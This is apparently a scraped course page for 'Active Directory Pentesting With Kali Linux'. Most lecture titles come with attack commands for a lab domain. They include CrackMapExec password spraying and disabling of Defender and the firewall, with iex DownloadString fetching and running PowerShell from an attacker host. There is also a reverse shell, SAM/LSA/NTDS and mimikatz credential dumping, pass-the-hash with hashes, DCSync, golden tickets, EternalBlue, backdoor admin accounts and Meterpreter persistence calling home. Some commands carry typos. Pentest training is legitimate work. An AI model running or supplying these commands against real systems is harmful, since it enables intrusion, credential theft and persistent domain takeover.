Active Directory Pentesting With Kali Linux Read Team Hacking
Tags: Active Directory
Attacking and Hacking Active Directory With Kali Linux Full Course - Red Team Hacking Pentesting
Last updated 2022-01-10 | 4.2
- How to Use Metasploit to Exploit Active Directory- How to Use Empire to Exploit Active Directory
- How to Use Evil-WinRM to Exploit Active Directory
What you'll learn
* Requirements
* How Active Directory Work* Windows Server Experience
Description
- How to Use Metasploit to Exploit Active Directory
- How to Use Empire to Exploit Active Directory
- How to Use Evil-WinRM to Exploit Active Directory
- How to Use CrackMapExec to Exploit Active Directory
- How to Exploit Active Directory From Windows
- How to Do Active Directory Enumeration
- How to do Lateral Movement
- Active Directory Post Exploitation
- Active Directory Domain Privilege Escalation
- Active Directory Persistence Attacks
- How to use Kali Linux to hack Active Directory
- How to use nmap to Enumerate Servers
- How to exploit EternalBlue
Course content
11 sections • 105 lectures
Introduction Preview 02:04
winapsearch Preview 19:21
https://github.com/ropnop/windapsearch
LdapDomainDump Preview 15:24
Download it here:
https://github.com/dirkjanm/ldapdomaindump
Enumerating With Enum4Linux Preview 09:04
enum4linux -u ippsec -p Password12345 -a 192.168.1.50
NMAP - Users Preview 06:24
nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ippsec,cn=users,dc=pentesting,dc=local",ldap.password=Password12345,ldap.qfilter=users,ldap.attrib=sAMAccountName' 192.168.1.50 -Pn
nmap -p 88 --script=krb5-enum-users --script krb5-enum-users --script-args krb5-enum-users.realm='pentesting.local' 192.168.1.50 -Pn
GetADUsers.py Preview 08:31
wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/GetADUsers.py
python3 GetADUsers.py -all -dc-ip 192.168.1.50 pentesting.local/ippsec
wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/findDelegation.py
python3 findDelegation.py -dc-ip 192.168.1.50 pentesting.local/ippsec
python3 GetUserSPNs.py -dc-ip 192.168.1.50 pentesting.local/ippsec
CrackMapExec Intro Preview 08:53
https://github.com/byt3bl33d3r/CrackMapExec
CrackMapExec - Password Spraying Preview 12:37
Bruteforcing examples
crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --no-bruteforce
crackmapexec <protocol> <target(s)> -u username1 username2 -p password1
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes
CrackMapExec - ENUM 1.1 Preview 09:49
Enumerate shares and access
crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --shares
Enumerate active sessions
crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --sessions
Enumerate disks
crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --disks
Enumerate logged on users
crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --loggedon-users
Enumerate domain users
crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --users
CrackMapExec - ENUM 1.2 Preview 09:41
python3 crackmapexec.py smb 192.168.1.50 -u 'ippsec' -p 'Password12345' --users
Enumerate users by bruteforcing RID
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --rid-brute
Enumerate domain groups
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --groups
Enumerate local groups
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-groups
Obtain domain password policy
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --pass-pol
CrackMapExec - Command Execution Preview 13:35
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'whoami'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'ipconfig'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'whoami /groups'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Get-MpComputerStatus'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Set-MpPreference -DisableRealtimeMonitoring $true'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Get-MpComputerStatus'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Set-MpPreference -DisableIOAVProtection $true'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'netsh advfirewall show allprofiles'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'netsh advfirewall set allprofiles state off'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Invoke-WebRequest -Uri "http://192.168.1.223:8000/users.txt" -OutFile "c:\Users\ippsec\Desktop\user.txt"'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'dir c:\Users\ippsec\Desktop'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'type c:\Users\ippsec\Desktop\user.txt'
crackmapexec - Command execution + Using Local Auth Preview 12:11
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -x 'net user /add admin Password12345'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -x 'net user'
#Add to Administrator Group
crackmapexec winrm 192.168.215.138 -u ippsec -p Password12345 -x 'net localgroup administrators admin /add'
crackmapexec winrm 192.168.215.138 -u ippsec -p Password12345 -x 'net localgroup administrators'
crackmapexec 192.168.215.138 -u admin -p Password12345 --local-auth
Get PowerShell Reverse Shell Preview 11:26
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcpOneLine.ps1
mv Invoke-PowerShellTcpOneLine.ps1 invoke.ps1
nc -lvp 1234
crackmapexec wirm 192.168.1.54 -u ippsec -p Password12345 -X 'iex (New-Object Net.WebClient).DownloadString("http://192.168.1.223:8000/invoke.ps1")'
Dumping SAM Preview 05:36
SAM is short for the Security Account Manager which manages all the user accounts and their passwords. It acts as a database. All the passwords are hashed and then stored SAM. It is the responsibility of LSA (Local Security Authority) to verify user login by matching the passwords with the database maintained in SAM. SAM starts running in the background as soon as the Windows boots up. SAM is found in C:\Windows\System32\config and passwords that are hashed and saved in SAM can found in the registry, just open the Registry Editor and navigate yourself to HKEY_LOCAL_MACHINE\SAM.
crackmapexec smb 192.168.1.54 -u ippsec -p Password12345 --sam
ls ~/.cme/logs/
ls ~/.cme/logs/
Dumping LSA + PTH with CME Preview 16:43
sudo crackmapexec smb 192.168.1.54 -u ippsec -p Password12345 --lsa
#Where the dumps are stored
ls ~/.cme/logs/
cracking with John
john --format=NT hash
john --format=NT hash --show
john --format=NT --wordlist=/home/user/Desktop/rockyou.txt hash
crackmapexec winrm 192.168.1.54 -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da -X 'whoami'
#against the domain controller, too
crackmapexec winrm 192.168.1.54 -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da -X 'whoami'
#Dump the entire NTLM --ntds database
sudo crackmapexec smb 192.168.1.50 -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da --ntds
pth-winexe and xfreerdp Preview 10:07
pth-winexe -U pentesting/
pth-winexe
apt-get update
apt-get install freerdp-x11
xfreerdp /u:ippsec /d:win2012 /pth: /v:192.168.1.54
CrackMapExec Modules Preview 13:40
crackmapexec smb -L
crackmapexec smb -M mimikatz --options
sudo crackmapexec smb 192.168.1.54 -M mimikatz -u ippsec -p Password12345
sudo crackmapexec smb 192.168.1.54 -M mimikatz -u ippsec -p Password12345 --server-port 81
saved here
ls /root/.cme/logs/
CrackMapExec CMEDB Preview 06:48
#start the database
cmedb
help
proto smb
help
creds
sudo crackmapexec smb 192.168.1.50 -id 2
sudo crackmapexec smb 192.168.1.50 -id 3
BloodHound Installation Preview 20:40
Install Java:
echo "deb http://httpredir.debian.org/debian stretch-backports main" | sudo tee -a /etc/apt/sources.list.d/stretch-backports.list
sudo apt-get update
Install Neo4j
Add the neo4j repo to your apt sources:
wget -O - https://debian.neo4j.com/neotechnology.gpg.key | sudo apt-key add -
echo 'deb https://debian.neo4j.com stable 4.0' > /etc/apt/sources.list.d/neo4j.list
sudo apt-get update
Install apt-transport-https with apt
apt-get install apt-transport-https
3. Install neo4j community edition using apt:
sudo apt-get install neo4j
4. Stop neo4j
systemctl stop neo4j
5. Start neo4j
cd /usr/bin
./neo4j console or systemctl start neo4j
Open a web browser and navigate to https://localhost:7474/.
You should see the neo4j web console.
Authenticate to neo4j in the web console with username neo4j, password neo4j.
You’ll be prompted to change this password.
Download the BloodHound GUI
Download the latest version of the BloodHound GUI from
https://github.com/BloodHoundAD/BloodHound/releases
Unzip the folder, then run BloodHound with the –no-sandbox flag:
./BloodHound.bin --no-sandbox
https://bloodhound.readthedocs.io/en/latest/installation/linux.html
BADDD No AUDIO Getting Shells with CrackMapExec Preview 08:50
sudo msfconsole
use exploit/multi/handler
set LHOST 192.168.1.223 <-- local Machine
set LPORT 470
python3 -m http.server
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'iex (New-Object Net.WebClient).DownloadString("http://192.168.1.223:8000/invoke.ps1")'
Basic commands Preview 06:15
AMSI
AntiMalware Scan Interface
Windows AMSI is integrated into the following components:
PowerShell (scripts, interactive use, and dynamic code evaluation)
PowerShell ISE (Windows PowerShell-IDE)
Windows Script Host (Wscript.exe and Cscript.exe) (scripts and dynamic code evaluation)
User Account Control (UAC) (using a different type of AMSI-provider)
Office365 (JavaScript/VBA)
Office365 (Documents)
.Net Framework 4.8 (Scanning for all assemblies)
Windows Management Instrumentation (WMI)
Upload and Download Preview 04:30
upload: local files can be auto-completed using tab key. It is not needed to put a remote_path if the local file is in the same directory as evil-winrm.rb file.
usage: upload local_path remote_path
download: it is not needed to set local_path if the remote file is in the current directory.
usage: download remote_path local_path
services: list all services. No administrator permissions needed.
PowerView.ps1 Preview 07:20
iex(new-object net.webclient).downloadstring(http://192.168.1.223:8000/PowerView.ps1')
Build SharpSploit - Enumeration Preview 06:11
Dll-Loader -http -path http://192.168.1.223:8000/SharpSploit.dll
menu
[SharpSploit.
[SharpSploit.Enumeration.Net]::GetNetLocalGroupMembers()
[SharpSploit.Enumeration.Net]::GetNetLocalGroups()
[SharpSploit.Enumeration.Net]::GetNetLoggedOnUsers()
[SharpSploit.Enumeration.Net]::GetNetSessions()
[SharpSploit.Enumeration.Net]::GetNetShares()
User, Group, and Network Preview 00:29
User Enumeration
Get current username
echo %USERNAME% || whoami
$env:username
List user privilege
whoami /priv
whoami /groups
List all users
net user
whoami /all
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
List logon requirements; useable for bruteforcing
net accounts
Get details about a user (i.e. administrator, admin, current user)
net user administrator
net user admin
net user %USERNAME%
List all local groups
net localgroup
Get-LocalGroup | ft Name
Get details about a group (i.e. administrators)
net localgroup administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource
Network Enumeration
List all network interfaces, IP, and DNS.
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
List current routing table
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
List the ARP table
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
List all current connections
netstat -ano
List firewall state and current configuration
netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config
List firewall's blocked ports
$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports
Disable firewall
netsh firewall set opmode disable
netsh advfirewall set allprofiles state off
List all network shares
net share
SNMP Configuration
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
OS, AV, and Configuration Preview 00:54
Tools - Local Priv Esc Preview 01:03
https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg
Sherlock and Watson Preview 07:10
https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg
https://github.com/rasta-mouse/Sherlock
https://github.com/rasta-mouse/Watson
CVE-2019-1388 Preview 07:37
SEImpersonate Preview 10:19
Unquoted Service Path Preview 19:03
Windows - Privilege Escalation and Local Enumeartion Cheat Sheet Preview 00:00
Recommended Windows Hack The Box machines Preview 00:09
Basics and Installing Preview 11:41
https://github.com/BC-SECURITY/Empire
sudo apt install powershell-empire
sudo powershell-empire
Getting a Shell + CME + Powershell Preview 07:10
https://alpinesecurity.com/blog/empire-a-powershell-post-exploitation-tool/
Getting a shell + Evil-WinRM + Bat File Preview 11:22
Listeners
help
uselistener http
info <- it will display all the options that you can tweak
BindIP to Kali’s IP address
Port to any port number other than 80
execute
https://www.youtube.com/watch?v=52xkWbDMUUM&ab_channel=HackerSploit
Privilege Escalation 1 - ReverShell With Unquoted Path Preview 25:33
Privilege Escalation 2 - Stager with NT/SYSTEM Preview 06:04
Privilege Escalation 3 Preview 11:06
net user raba Password123 /add
net localgroup administrators raba /add
net localgroup "Remote Management Users" raba /add
remove old
Elevated with Empire - Mimikatz and pth Preview 08:39
Pth + dcsync + dcshadow -1 Preview 15:02
Troubleshooting Empire Pth + dcsync + dcshadow - 2 Preview 15:10
Failed to get + dcsync + dcshadow - 3 Preview 04:39
Getting Shell with JenkinsAdmin Preview 06:38
evil-winrm -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da -i 192.168.1.50
upload /tmp/launcher.bat C:\Users\jenkinsadmin\Documents\launcher.bat
C:\Users\jenkinsadmin\Documents\launcher.bat
Finally Getting Dcsync + Persistent Preview 06:28
Intro Preview 12:45
Metasploit is a penetration testing framework that makes hacking simple. It's an essential tool for many attackers and defenders. Point Metasploit at your target, pick an exploit, what payload to drop, and hit Enter.
Exploiting Ethernal Blue Metasploit Preview 09:24
Check if it is exploitable:
use exploit/windows/smb/ms17_010_psexec
set rhosts 192.168.1.53
set smbpass Password123
set smbuser student1
set smbdomain pentesting.local
set paylod windows/meterpreter/reverse_tcp
run
/
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
Enumeration 1 - User, Groups, Computers Preview 12:23
use Auxiliary/gather/Kerberos_enumusers
sysinfo
ps
post/windows/gather/enum_ad_users
post/windows/gather/enum_domain_group_users
post/windows/gather/enum_logged_on_users
post/windows/gather/enum_ad_user_comments
post/windows/gather/enum_domain_group_users
post/windows/gather/enum_domain
post/windows/gather/enum_computers
post/windows/gather/resolve_sid.rb
run post/windows/gather/enum_ad_computers.rb
post/windows/gather/local_admin_search_enum
post/windows/gather/enum_ad_service_principal_names
Enumeration 2 - Arp, Tokens, Patches Preview 11:22
run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24
ipconfig
netstat
route
#Windows Gather Enumerate Domain Admin Tokens (T
post/windows/gather/enum_tokens
post/windows/gather/enum_patches
post/windows/gather/credentials/winscp
#Windows Gather Powershell Environment Setting E
post/windows/gather/enum_powershell_env
post/windows/gather/enum_ie
post/windows/gather/bloodhound
for More
search post/windows/gather/
Enumeration 3 - Shares, SMB, and More Preview 09:47
use post/windows/gather/enum_shares
use post/windows/gather/enum_services
use post/windows/gather/enum_snmp
use post/windows/gather/enum_chrome
use post/windows/gather/enum_av_excluded
use post/windows/gather/enum_putty_saved_sessions
use post/windows/gather/enum_applications
use post/windows/gather/win_privs
use post/windows/gather/forensics/browser_history
for more:
search post/windows/gather/
Exploit Suggestor Preview 08:51
LOCAL_EXPLOIT_SUGGESTER
run post/multi/recon/local_exploit_suggester
post/windows/gather/win_privs
Exploit Suggestor 2 Preview 10:26
Back door add user Preview 07:19
post/windows/manage/add_user
set addtogroup true
set username test
set group administrators
set session 2
post/windows/manage/delete_user
HashDump With Metasploit Preview 06:28
search hashdump
search credential_collector
post/windows/gather/hashdump
post/windows/gather/credentials/credential_collector
meterpreter > load kiwi
meterpreter > help
Testing Credentials
crackmapexec smb 192.168.1.50 192.168.1.55 -u ippsec -p Password123!
Lateral Movement - PTH With metasploit Preview 14:40
https://www.offensive-security.com/metasploit-unleashed/psexec-pass-hash/
Pass The Hash with Psexec: Due to perform this jobs, only we need is NTLM hash of a privileged user. Thats exactly what we gained before with mimikatz.
use exploit/windows/smb/psexec
set SMBDomain pentesting.local
set smbuser ippsec
set SMBPass e52cac67419a9a22c17ec4fe2a5374cb:2b576acbe6bcfda7294d6bd18041b8fe
set rhosts 192.168.1.55
set lport 4457
options
load kiwi
creds_msv
00000000000000000000000000000000
see if user is part of Domain Users
use post/windows/gather/enum_domain_group_users
Lateral Movement To DC - Metasploit Preview 11:42
Pass The Hash with Psexec: Due to perform this jobs, only we need is NTLM hash of a privileged user. Thats exactly what we gained before with mimikatz.
use exploit/windows/smb/psexec
set SMBDomain pentesting.local
set smbuser s4vitar
set SMBPass 00000000000000000000000000000000:58a478135a93ac3bf058a5ea0e8fdb71
set rhosts 192.168.1.50
set lport 4457
options
load kiwi
creds_msv
00000000000000000000000000000000
see if user is part of Domain Users
use post/windows/gather/enum_domain_group_users
use post/windows/gather/credentials/domain_hashdump
scanner/smb/impacket/secretsdump
Steal_Token and Dumping All Hashes - Metasploit Preview 05:58
In metasploit framework there is an extension which is called incognito which allows us to perform activities such as token stealing and manipulation.These kind of activities are important in the privilege escalation stage of a penetration test because if we can steal the token of an administrator for example we can perform higher privilege operations on the target.
use post/windows/gather/credentials/domain_hashdump
use incognito
list_tokens -u
impersonate_token PENTESTING\\Administrator
DcSync With Metasploit Preview 04:55
From Domain Controller
meterpreter > use incognito
meterpreter > impersonate_token PENTESTING\\Administrator
meterpreter > load kiwi
meterpreter > help
meterpreter > kiwi_cmd '"lsadump::dcsync /user:Administrator"'
meterpreter > kiwi_cmd '"lsadump::dcsync /user:krbtgt"'
Golden Ticket With Metasploit Preview 07:17
use post/windows/escalate/golden_ticket
Golden Ticket attacks can be carried out against Active Directory domains, where access control is implemented using Kerberos tickets issued to authenticated users by a Key Distribution Service.
The attacker gains control over the domain’s Key Distribution Service account (KRBTGT account) by stealing its NTLM hash. This allows the attacker to generate Ticket Granting Tickets (TGTs) for any account in the Active Directory domain.
With valid TGTs, the attacker can request access to any resource/system on its domain from the Ticket Granting Service (TGS).
Because the attacker is controlling the component of the access control system that is responsible for issuing Ticket Granting Tickets (TGTs), then he has the golden ticket to access any resource on the domain.
kerberos_ticket_list
kerberos_ticket_use /root/.msf4/loot/20210501011013_default_192.168.1.50_golden.ticket_888290.bin
BACKDOOR METERPRETER SERVICE 1 Preview 05:30
After going through all the hard work of exploiting a system, it’s often a good idea to leave yourself an easier way back into the system for later use. This way, if the service you initially exploited is down or patched, you can still gain access to the system. Metasploit has a Meterpreter script, persistence.rb, that will create a Meterpreter service that will be available to you even if the remote system is rebooted.
meterpreter > run persistence -h
meterpreter > run persistence -U -i 5 -p 4458 -r 192.168.1.223
meterpreter > exit
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.223
set LPORT 4458
exploit
When a user logs in to the remote system, a Meterpreter session is opened up for us.
BACKDOOR METERPRETER SERVICE 2 Preview 01:28
Intro Domain Enumeration Preview 00:39
https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg
Domain User Enumeration Preview 13:41
Domain Group Enumeration Preview 10:54
Domain Computer/Servers Enumeration Preview 07:10
PowerView - GPO and OU Preview 12:42
Domain Shares Enumeration Preview 10:39
PowerView - ACL Preview 20:55
Active Directory Recon Preview 08:58
BloodHound Installation Preview 16:31
BloodHound Basics Preview 17:38
Domain Enumeration Cheat Sheet - PowerView Preview 00:00
Intro to Lateral Movement - RDP Preview 01:01
https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg
How Kerberos Work Preview 00:00
Dumping SAM and SYSTEM For Offline Cracking Preview 11:55
SAM & LSA with MimiKatz Preview 08:26
PassTheHash with MimiKatz Preview 17:22
A Pass-the-Hash (PtH) attack is a technique whereby an attacker captures a password hash (as opposed to the password characters) and then simply passes it through for authentication and potentially lateral access to other networked systems. The threat actor doesn’t need to decrypt the hash to obtain a plain text password. PtH attacks exploit the authentication protocol, as the passwords hash remains static for every session until the password is rotated. Attackers commonly obtain hashes by scraping a system’s active memory and other techniques.
Passing the ticket Preview 15:16
In a pass-the-ticket attack, an attacker is able to extract a Kerberos Ticket Granting Ticket (TGT) from LSASS memory on a system and then use this on another system to request Kerberos service tickets (TGS) to gain access to network resources.
One primary difference between pass-the-hash and pass-the-ticket, is that Kerberos TGT tickets expire (10 hours by default) whereas NTLM hashes only change when the user changes their password. So a TGT ticket must be used within its lifetime, or it can be renewed for a longer period of time (7 days).
Pass the ticket with Rubeus Preview 08:07
Session Hijack Preview 04:46
SMB Relay Attack Preview 08:10
10 ways to get dump files Preview 00:00
Intro - Domain Privilege Escalation Preview 00:53
https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg
ACL - GenericAll on Group Preview 11:45
Priv Esc – DNSAdmins Preview 22:20
dcsync Preview 19:19
Unconstrained delegation - Computer Preview 15:22
constrained Delegation - Computer Preview 14:52
ACL - GenericWrite on User Preview 12:18
SET-SPN - Kerberoast Preview 15:25
Targeted Kerberoasting - AS-REPs - FINDING Preview 11:30
Targeted Kerberoasting - AS-REPs - SET Preview 12:36
Intro Domain Persistence and Dominance - RDP Preview 00:57
https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg